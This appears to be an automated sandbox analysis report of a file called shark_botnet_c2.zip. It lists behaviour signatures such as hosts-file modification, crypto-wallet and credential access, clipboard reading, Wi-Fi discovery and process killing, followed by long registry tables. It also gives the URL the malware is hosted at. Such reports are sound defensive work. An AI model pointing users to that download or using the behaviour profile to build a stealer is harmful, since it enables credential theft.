Analysis Overview
Threat Level: Likely malicious
The file https://sharksecurity.vercel.app/shark_botnet_c2.zip was found to be: Likely malicious.
Malicious Activity Summary
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
A potential corporate email address has been identified in the URL: currency-file@1
Unsecured Credentials: Credentials In Files
A potential corporate email address has been identified in the URL: =@L
Clipboard Data
Executes dropped EXE
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Obfuscated Files or Information: Command Obfuscation
UPX packed file
Enumerates processes with tasklist
System Network Configuration Discovery: Wi-Fi Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Browser Information Discovery
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Modifies registry class
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Gathers system information
Views/modifies file attributes
Suspicious behavior: EnumeratesProcesses
Detects videocard installed
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-07 16:30
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-07 16:30
Reported
2024-11-07 16:36
Platform
win10v2004-20241007-en
Max time kernel
387s
Max time network
388s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Temp1_villburs-xray-pack.zip\sharkbotnetc2.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
A potential corporate email address has been identified in the URL: =@L
A potential corporate email address has been identified in the URL: currency-file@1
Clipboard Data
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI35202\rar.exe | N/A |
Loads dropped DLL
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133754707828275862" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\NodeSlot = "5" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Downloads" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
